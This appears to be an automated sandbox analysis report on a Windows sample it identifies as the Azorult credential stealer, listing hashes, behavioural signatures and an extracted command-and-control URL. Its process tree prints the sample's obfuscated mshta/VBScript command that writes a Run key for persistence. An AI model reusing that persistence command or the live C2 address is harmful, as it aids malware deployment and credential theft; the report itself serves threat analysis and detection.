Analysis
-
max time kernel
97s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-07-2022 05:18
Static task
static1
Behavioral task
behavioral1
Sample
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
Resource
win10v2004-20220414-en
General
-
Target
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
-
Size
836KB
-
MD5
bab64cf036bc9fd6cc8af20bda3f12e3
-
SHA1
82d47ceefe73b819b0c3dc50460086c090846241
-
SHA256
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c
-
SHA512
ce2f52c4f48c13ac6085446f2089d1668a2c8db136a7b821c6de20791e5f09b7a02db06c2f5333cd365e7235219f4a3edf5f4993a8d56ee25a8a18bd460fd846
Malware Config
Extracted
azorult
http://37.72.175.157:8080/chi/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 1 IoCs
Processes:
COPENS.exepid process 4568 COPENS.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Udskamningens2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe" mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exeCOPENS.exepid process 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe 4568 COPENS.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exedescription pid process target process PID 1488 wrote to memory of 4564 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 1488 wrote to memory of 4564 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 1488 wrote to memory of 4564 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe mshta.exe PID 1488 wrote to memory of 4568 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe PID 1488 wrote to memory of 4568 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe PID 1488 wrote to memory of 4568 1488 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe COPENS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2"" : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\COPENS.exe"",""REG_SZ"" : window.close")2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\COPENS.exe"C:\Users\Admin\AppData\Local\Temp\COPENS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\COPENS.exeFilesize
836KB
MD53c98a0d1f58b70aa683bea99b3f92811
SHA1bdcae100842c0441de4c8f2ecb5b98ac45a2d139
SHA2566cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
SHA512334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
-
C:\Users\Admin\AppData\Local\Temp\COPENS.exeFilesize
836KB
MD53c98a0d1f58b70aa683bea99b3f92811
SHA1bdcae100842c0441de4c8f2ecb5b98ac45a2d139
SHA2566cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
SHA512334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
-
memory/1488-140-0x0000000077AD0000-0x0000000077C73000-memory.dmpFilesize
1.6MB
-
memory/1488-133-0x0000000077AD0000-0x0000000077C73000-memory.dmpFilesize
1.6MB
-
memory/1488-132-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmpFilesize
2.0MB
-
memory/1488-138-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmpFilesize
2.0MB
-
memory/4564-134-0x0000000000000000-mapping.dmp
-
memory/4568-135-0x0000000000000000-mapping.dmp
-
memory/4568-143-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4568-148-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmpFilesize
2.0MB
-
memory/4568-149-0x0000000077AD0000-0x0000000077C73000-memory.dmpFilesize
1.6MB
-
memory/4568-150-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmpFilesize
2.0MB
-
memory/4568-151-0x0000000077AD0000-0x0000000077C73000-memory.dmpFilesize
1.6MB
-
memory/4568-152-0x0000000077AD0000-0x0000000077C73000-memory.dmpFilesize
1.6MB